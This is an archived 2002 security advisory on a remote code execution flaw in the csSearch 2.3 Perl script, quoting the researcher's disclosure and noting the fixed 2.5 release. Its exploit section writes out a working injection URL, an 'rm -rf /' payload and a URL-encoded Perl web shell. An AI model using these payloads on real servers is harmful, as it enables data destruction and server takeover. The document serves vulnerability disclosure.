csSearch Perl-based Search Engine Software Lets Remote Users Execute Arbitrary Perl Scripts on the System
|
Date: Mar 26 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 2.3
|
Description: A vulnerability was reported in the csSearch Perl-based search engine script. A remote user can execute arbitrary commands on the server.
It is reported that a remote user can cause arbitrary configuration data to be written to the 'setup.cgi' file. This file is apparently
loaded when the script is executed, allowing the remote user to cause arbitrary Perl code to be executed.
A remote user can invoke
the following type of URL to load arbitrary Perl code that will be executed the next time the search engine is executed:
csSearch.cgi?command=savesetup&setup=PERL_CODE
_HERE
|
Impact: A remote user can execute arbitrary Perl code on the server.
|
Solution: The vendor has released a fixed version (2.5), available at:
http://www.cgiscript.net/download/download.htm
|
Vendor URL: www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=7 (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Underlying OS Comments: Perl-based
|
Reported By: Steve Gustin <stegus1@yahoo.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Mon, 25 Mar 2002 14:47:23 -0800 (PST)
From: Steve Gustin <stegus1@yahoo.com>
Subject: CGIscript.net - csSearch.cgi - Remote Code Execution (up to 17,000 sites vulnerable)
|
CGIscript.net - csSearch.cgi - Remote Code Execution
(up to 17,000 sites vulnerable)
---------------------------------------------------------------------
Name : csSearch.cgi - Remote Code Execution
Date : March 25, 2002
Product : csSearch
Version : 2.3 (vulnerable)
Vuln Type : Access Validation Error
Severity : HIGH RISK
Vendor : WWW.CGIscript.NET, LLC.
Homepage : http://www.cgiscript.net/
DISCUSSION:
---------------------------------------------------------------------
csSearch is a free perl cgi search script developed by
Mike Barone and Andy Angrick. According to the website
(cgiscript.net) over 17,000 people have downloaded
csSearch.
csSearch stores it's configuration data as perl code
in a file called "setup.cgi" which is eval()uated by
the script to load it back into memory at runtime.
Due to an Access Validation Error, any user can cause
configuration data to be written to "setup.cgi" and
therefore execute arbitrary perl code on the server.
The paid version of this script, csSearch Pro, may
also be vulnerable.
EXPLOIT:
---------------------------------------------------------------------
Configuration data is saved with the following URL.
Note that any perl code would need to be URL encoded.
csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE
For example, the classic "rm -rf /" example would be
as follows:
csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`
Here's something a little more interesting, less than
300 bytes of code that turns csSearch into a remote
web shell of sorts.
*ShowSearchForm = *Login = sub {
print "<form method=post action=csSearch.cgi>Enter
Command (eg: ls -l)<br>";
print "<input type=text name=cmd size=99> ";
print "<input type=submit value=Execute><hr><xmp>";
$in{'cmd'} && print `$in{'cmd'} 2>&1`;
exit;
};
URL Encoded as:
csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3D
post+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcm
d+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd
'}%26%26print`$in{'cmd'}+2>%261`;exit;};
IMPACT:
---------------------------------------------------------------------
Because of the high number of users who have
downloaded this script (over 17,000 according to
cgiscript.net) and the fact that search engines can
easily be used to identify sites with the unique
"csSearch.cgi" script name, the risk posed by this
flaw is very high indeed.
SOLUTION:
---------------------------------------------------------------------
Vendor has released a new version, csSearch 2.5, which
patches the flaw.
ISPs and Web hosts may want to consider searching for
this script on their servers ("csSearch.cgi") and
disabling it or advising their customers of the risk
until they can install the patched version.
DISCLAIMER
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.
FEEDBACK:
---------------------------------------------------------------------
stegus1@yahoo.com
__________________________________________________
Do You Yahoo!?
Yahoo! Movies - coverage of the 74th Academy Awards®
http://movies.yahoo.com/
|
|
